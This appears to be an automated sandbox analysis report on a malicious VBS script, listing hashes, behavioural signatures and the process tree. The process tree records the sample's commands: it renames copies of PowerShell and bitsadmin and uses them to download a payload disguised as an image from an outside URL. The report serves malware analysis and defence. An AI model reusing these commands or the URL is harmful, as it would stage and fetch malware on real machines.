Analysis
-
max time kernel
158s -
max time network
163s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
24-03-2022 23:27
Static task
static1
Behavioral task
behavioral1
Sample
5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c.vbs
Resource
win7-20220311-en
windows7_x64
0 signatures
0 seconds
General
-
Target
5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c.vbs
-
Size
6KB
-
MD5
d7c45aaa2ec4c379c3590e85efd3e27c
-
SHA1
182d0dd1d7e8c4797b70550c1fa26d20e691df37
-
SHA256
5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c
-
SHA512
b832b5d84d581d7bc9282cdcce3752d8423e0967a786c9c54601c270e9743267d57c0de68c0e5c97f51af3d1be040b341dc04f50e12c3e6700eb11282910c217
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 3540 ZAblYWBin.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 4532 wrote to memory of 1664 4532 WScript.exe 80 PID 4532 wrote to memory of 1664 4532 WScript.exe 80 PID 1664 wrote to memory of 4580 1664 cmd.exe 82 PID 1664 wrote to memory of 4580 1664 cmd.exe 82 PID 1664 wrote to memory of 4524 1664 cmd.exe 83 PID 1664 wrote to memory of 4524 1664 cmd.exe 83 PID 4532 wrote to memory of 3540 4532 WScript.exe 84 PID 4532 wrote to memory of 3540 4532 WScript.exe 84 PID 4532 wrote to memory of 3540 4532 WScript.exe 84
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zDygeqh.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\ZAblYWB*.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\cmd.execmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zDygeqh.exe3⤵PID:4580
-
-
C:\Windows\system32\cmd.execmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\ZAblYWB*.exe3⤵PID:4524
-
-
-
C:\ProgramData\ZAblYWBin.exe"C:\ProgramData\ZAblYWBin.exe" /transfer bHfBoa /download https://waybackwhenbycynthia.com/edikaso/09518900965/map.jpg C:\Users\Admin\AppData\Roaming\map.jpg2⤵
- Executes dropped EXE
PID:3540
-